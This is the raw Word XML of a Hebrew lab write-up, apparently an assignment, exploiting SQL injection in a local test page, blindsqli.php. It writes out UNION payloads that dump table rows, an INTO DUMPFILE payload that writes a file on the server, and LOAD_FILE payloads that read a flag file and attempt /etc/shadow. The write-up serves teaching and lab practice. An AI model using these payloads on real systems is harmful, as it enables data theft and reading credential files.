      <w:pPr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938AF" wp14:editId="395C4851">
            <wp:extent cx="5943600" cy="1839595"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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DBA1" w14:textId="45F9EF9E" w:rsidR="00E0726E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כעת לא הוחזרה אף רשומה, כלומר אין עוד עמודות. בכך הכל בטבלה </w:t>
      </w:r>
      <w:r w:rsidR="00DB0FD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הנ"ל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שבמסד הנתונים </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>secure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יש 2 עמודות </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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id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 ו-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>random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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7CF1D6" w14:textId="0DDF5E81" w:rsidR="0077288F" w:rsidRDefault="00E0726E" w:rsidP="00E0726E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כעת נרצה לגלות כמה ערכים יש בטבלה הזו. כדי לגלות זאת נשתמש בפונקציה </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>count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שסופרת את מספר הרשומות בטבלה. </w:t>
      </w:r>
      <w:r w:rsidR="0077288F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נבצע את הפקודה הבאה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6C7504" w14:textId="77777777" w:rsidR="00DB0FD7" w:rsidRPr="00DB0FD7" w:rsidRDefault="00DB0FD7" w:rsidP="00DB0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COUNT(*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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),COUNT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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(*),COUNT(*),COUNT(*),COUNT(*) FROM secure.789b05678e7f955d2cf125b0c05616c9); --%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E258313" w14:textId="61B3A070" w:rsidR="0077288F" w:rsidRDefault="0077288F" w:rsidP="0077288F">
      <w:pPr>
        <w:rPr>
          <w:noProof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שתחזיר לנו את כמות הרשומות בטבלה הנ"ל</w:t>
      </w:r>
      <w:r w:rsidR="00DB0FD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 פעמים כדי להתאים למספר העמודות של הטבלה </w:t>
      </w:r>
      <w:r w:rsidR="00DB0FD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="00DB0FD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> איתה אנו עושים </w:t>
      </w:r>
      <w:r w:rsidR="00DB0FD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidR="00DB0FD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB0FD7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נקבל שמספר הרשומות הוא 3:</w:t>
      </w:r>
      <w:r w:rsidR="00DB0FD7" w:rsidRPr="00DB0FD7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB0FD7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B4E18E4" wp14:editId="20B1D7E1">
            <wp:extent cx="5943600" cy="1779905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D063" w14:textId="5A30478F" w:rsidR="00DB0FD7" w:rsidRDefault="00DB0FD7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hint="cs"/>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
        <w:t>כעת נרצה לגלות את ערכי הרשומות. נעשה אותו דבר כמו קודם</w:t>
      </w:r>
      <w:r w:rsidR="00EF2BD0">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (נקבל בכל פעם רשומה אחת ונוסיף אותה לתנאי)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C845862" w14:textId="77777777" w:rsidR="00DB0FD7" w:rsidRPr="00DB0FD7" w:rsidRDefault="00DB0FD7" w:rsidP="00DB0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69,69,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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69,id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DB0FD7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,random FROM secure.789b05678e7f955d2cf125b0c05616c9); --%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4809E1BA" w14:textId="2243E47C" w:rsidR="0077288F" w:rsidRDefault="00AB3647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743AFCB2" wp14:editId="6D6A6551">
            <wp:extent cx="5943600" cy="172339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1EC6" w14:textId="3A9C98A9" w:rsidR="00AB3647" w:rsidRPr="00AB3647" w:rsidRDefault="00AB3647" w:rsidP="00AB36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B364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69,69,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB3647">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>69,id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB3647">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,random FROM secure.789b05678e7f955d2cf125b0c05616c9 WHERE id &lt;&gt; 1); --%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D48CF" w14:textId="24996130" w:rsidR="00AB3647" w:rsidRDefault="00AB3647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259C418" wp14:editId="046BB1AD">
            <wp:extent cx="5943600" cy="1798320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9597" w14:textId="77777777" w:rsidR="00AB3647" w:rsidRPr="00AB3647" w:rsidRDefault="00AB3647" w:rsidP="00AB36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647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69,69,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AB3647">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>69,id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AB3647">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,random FROM secure.789b05678e7f955d2cf125b0c05616c9 WHERE id &lt;&gt; 1 AND ID &lt;&gt; 2); --%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B324774" w14:textId="66F7C101" w:rsidR="00AB3647" w:rsidRDefault="00AB3647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C107EB9" wp14:editId="706ED53F">
            <wp:extent cx="5943600" cy="1738630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2B97" w14:textId="67E70FDE" w:rsidR="003E6AAA" w:rsidRDefault="00AB3647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כמובן שאם היו יותר רשומות היה אפשר לכתוב סקריפט שעושה את זה, אבל כיוון שמדובר רק ב-3 רשומות יותר מהיר לעשות את זה ידנית (כמובן שסקריפט מגניב יותר).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26589E27" w14:textId="77777777" w:rsidR="003E6AAA" w:rsidRDefault="003E6AAA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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C6337" w14:textId="25EDD699" w:rsidR="00AB3647" w:rsidRDefault="003E6AAA" w:rsidP="0077288F">
      <w:pP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 w:rsidRPr="003E6AAA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lastRenderedPageBreak/>
        <w:t>סעיף 6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D266C" w14:textId="6089BF67" w:rsidR="008D0F7E" w:rsidRDefault="008D0F7E" w:rsidP="0077288F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">נשים </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>לב שב-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MySQL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ניתן לכתוב תוצאה של פקודת </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT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לתוך קובץ בעזרת </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INTO OUTFILE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ו-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INTO DUMPFILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, נשתמש באופציה השנייה כי היא כותבת ישירות את הערכים ולא מרפדת אותם.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F80CC7A" w14:textId="39376A78" w:rsidR="008D0F7E" w:rsidRDefault="008D0F7E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הקלט שנשתמש בו הוא:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF9F57" w14:textId="77777777" w:rsidR="008D0F7E" w:rsidRPr="008D0F7E" w:rsidRDefault="008D0F7E" w:rsidP="008D0F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7E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'Hello, World','','','','' INTO DUMPFILE '/home/hello_world.txt'); --%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7625DE4F" w14:textId="41B98F4B" w:rsidR="008D0F7E" w:rsidRPr="008D0F7E" w:rsidRDefault="008D0F7E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נשים לב לטרמינל (הרצתי </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell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מה</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker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כדי לבדוק שהקובץ אכן נוצר). ניתן לראות שלפני ביצוע הפקודה לא היה קיים קובץ בשם </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hello_world.txt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ולאחר הרצתה קיים והתוכן שלו הוא </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hello, World</w:t>
      </w:r>
      <w:r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14:paraId="304E6474" w14:textId="06BAF7E2" w:rsidR="008D0F7E" w:rsidRDefault="008D0F7E" w:rsidP="0077288F">
      <w:pP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061307D" wp14:editId="38DDAD44">
            <wp:extent cx="5943600" cy="1387475"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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3F17" w14:textId="1086A9A3" w:rsidR="008D0F7E" w:rsidRDefault="008D0F7E" w:rsidP="0077288F">
      <w:pP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t>סעיף 7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19268D56" w14:textId="28D2A32F" w:rsidR="008D0F7E" w:rsidRDefault="00855F22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כדי לקרוא קובץ בעזרת </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MySQL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ניתן להשתמש בפקודה </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LOAD_FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, ולכן באותו עיקרון של הסעיפים הקודמים נשתמש בקלט הבא:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79549C36" w14:textId="77777777" w:rsidR="00855F22" w:rsidRPr="00855F22" w:rsidRDefault="00855F22" w:rsidP="00855F2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1,2,3,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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4,LOAD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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_FILE('/home/flag.txt')); --%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB15C5" w14:textId="757CCEDB" w:rsidR="00855F22" w:rsidRDefault="00855F22" w:rsidP="0077288F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BAAAC5" wp14:editId="333AF80C">
            <wp:extent cx="5943600" cy="1795780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0B53" w14:textId="77777777" w:rsidR="00924C14" w:rsidRDefault="00924C14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6E8C1A8E" w14:textId="77777777" w:rsidR="00924C14" w:rsidRDefault="00924C14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29C960B1" w14:textId="77777777" w:rsidR="00924C14" w:rsidRDefault="00924C14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69F02A04" w14:textId="77777777" w:rsidR="00924C14" w:rsidRDefault="00924C14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4656EE17" w14:textId="77777777" w:rsidR="00924C14" w:rsidRDefault="00924C14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5477C267" w14:textId="1B81868F" w:rsidR="00924C14" w:rsidRDefault="004472E3" w:rsidP="00924C1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">כמובן שזהו ערך בינארי ולא טקסט. </w:t>
      </w:r>
      <w:r w:rsidR="002C708F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>אם נרצה לראות את תוכן הקובץ בבינארית (הקסאדצימלית) ניתן להשתמש בכלי שממיר טקסט (</w:t>
      </w:r>
      <w:r w:rsidR="002C708F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
      <w:r w:rsidR="002C708F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">) להקסא. אני השתמשתי באתר </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00924C14" w:rsidRPr="00333A59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.rapidtables.com/convert/number/ascii-to-hex.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BC49482" w14:textId="5313CFA6" w:rsidR="00924C14" w:rsidRDefault="00924C14" w:rsidP="00924C14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2BA55D" wp14:editId="626144DF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352129" cy="4257675"/>
            <wp:effectExtent l="0" t="0" r="0" b="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29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hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>לאחר בדיקה בטרמינל זהו אכן תוכן הקובץ, וסיימנו.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A11F9E2" w14:textId="66830D38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4C9EF8D5" w14:textId="09BCD4E8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2C406D5F" w14:textId="3EB0ABFB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1AC28730" w14:textId="33C90F76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4362DF3C" w14:textId="431AD192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76E6A088" w14:textId="08A98116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69C9F03F" w14:textId="03129721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7B3C7239" w14:textId="58F6FF7A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16B3C52A" w14:textId="099F8792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48209F11" w14:textId="26831D67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0F0BC42C" w14:textId="517197F6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0DDF9941" w14:textId="560700C5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65B55B35" w14:textId="7978F1B1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2FDD13A7" w14:textId="4F47CD5A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109DCDD0" w14:textId="10ED6F6B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7FD820F4" w14:textId="2E0E3F50" w:rsidR="004472E3" w:rsidRDefault="004472E3" w:rsidP="00924C14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התוכן בפורמט </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D85FA8" w14:textId="77777777" w:rsidR="004472E3" w:rsidRPr="004472E3" w:rsidRDefault="004472E3" w:rsidP="004472E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3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\xc9\xcb\xbf\x3d\xed\x6f\x72\xfd\x41\x59\x3d\xde\x4a\x3a\x73\x178\x4f\xbf\x2f\x73\x6f\xfe\xd6\xd5\x46\xb0\x26\xa7\x6a\xf8\xd5\x58\x1e\xb4\x7c\x68\xae\x20\x1a\x2f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87C4CD" w14:textId="5D064777" w:rsidR="00733683" w:rsidRDefault="00733683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54F077E5" w14:textId="77777777" w:rsidR="00733683" w:rsidRDefault="00733683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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1454CF" w14:textId="774849A3" w:rsidR="00924C14" w:rsidRDefault="00733683" w:rsidP="00924C14">
      <w:pP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 w:rsidRPr="00733683"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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>סעיף 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3DF9B0" w14:textId="7CA81DB3" w:rsidR="00C17500" w:rsidRDefault="00C17500" w:rsidP="00924C14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בכדי לקרוא את הקובץ השתמשתי באותו היגיון של הסעיף הקודם </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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רק שיניתי את שם הקובץ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0363A875" w14:textId="329FD492" w:rsidR="00C17500" w:rsidRPr="00855F22" w:rsidRDefault="00C17500" w:rsidP="00C175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http://localhost:8000/blindsqli.php?user=' UNION (SELECT 1,2,3,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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4,LOAD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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_FILE('/</w:t>
      </w:r>
      <w:r w:rsidR="00E9109E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>etc/shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="00855F22">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>')); --%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588863A5" w14:textId="160A10A7" w:rsidR="00C17500" w:rsidRDefault="00C17500" w:rsidP="00924C14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B2DA63F" w14:textId="469D3CA5" w:rsidR="00E9109E" w:rsidRPr="00E9109E" w:rsidRDefault="00E9109E" w:rsidP="00924C14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs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אך ללא הצלחה. ככל הנראה לשרת ה-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL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אין הרשאה לקרוא את הקובץ, לכן לא ניתן לקרוא את הקובץ בעזרת הפקודה </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LOAD_FILE</w:t>
      </w:r>
      <w:r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sectPr w:rsidR="00E9109E" w:rsidRPr="00E9109E" w:rsidSect="00281462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AD9A" w14:textId="77777777" w:rsidR="004816AD" w:rsidRDefault="004816AD" w:rsidP="00D53CE4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5ECEBF7B" w14:textId="77777777" w:rsidR="004816AD" w:rsidRDefault="004816AD" w:rsidP="00D5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351B" w14:textId="77777777" w:rsidR="004816AD" w:rsidRDefault="004816AD" w:rsidP="00D53CE4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="41A5BE1C" w14:textId="77777777" w:rsidR="004816AD" w:rsidRDefault="004816AD" w:rsidP="00D5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DB3" w14:textId="282FF309" w:rsidR="00D53CE4" w:rsidRDefault="00D53CE4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E4"/>
    <w:rsid w:val="0010282A"/>
    <w:rsid w:val="00193285"/>
    <w:rsid w:val="00281462"/>
    <w:rsid w:val="002C708F"/>
    <w:rsid w:val="00373C71"/>
    <w:rsid w:val="003B16F9"/>
    <w:rsid w:val="003E6AAA"/>
    <w:rsid w:val="004472E3"/>
    <w:rsid w:val="00454F14"/>
    <w:rsid w:val="004816AD"/>
    <w:rsid w:val="005A1FFF"/>
    <w:rsid w:val="005B3066"/>
    <w:rsid w:val="005D396D"/>
    <w:rsid w:val="00733683"/>
    <w:rsid w:val="0077288F"/>
    <w:rsid w:val="00780B55"/>
    <w:rsid w:val="00781FDA"/>
    <w:rsid w:val="007A26B5"/>
    <w:rsid w:val="00855F22"/>
    <w:rsid w:val="008D0F7E"/>
    <w:rsid w:val="00924C14"/>
    <w:rsid w:val="00AB3647"/>
    <w:rsid w:val="00BF202A"/>
    <w:rsid w:val="00C14ADD"/>
    <w:rsid w:val="00C17500"/>
    <w:rsid w:val="00C34095"/>
    <w:rsid w:val="00C54B11"/>
    <w:rsid w:val="00C91A8D"/>
    <w:rsid w:val="00D53CE4"/>
    <w:rsid w:val="00DA5FD6"/>
    <w:rsid w:val="00DB0FD7"/>
    <w:rsid w:val="00E0726E"/>
    <w:rsid w:val="00E22FAE"/>
    <w:rsid w:val="00E9109E"/>
    <w:rsid w:val="00EA4B18"/>
    <w:rsid w:val="00EC06BF"/>
    <w:rsid w:val="00EF2BD0"/>
    <w:rsid w:val="00F1421F"/>
    <w:rsid w:val="00F75AE2"/>
    <w:rsid w:val="00F92E48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B1C7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FECA4E5F-E351-4DF2-82A0-197F4689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53CE4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
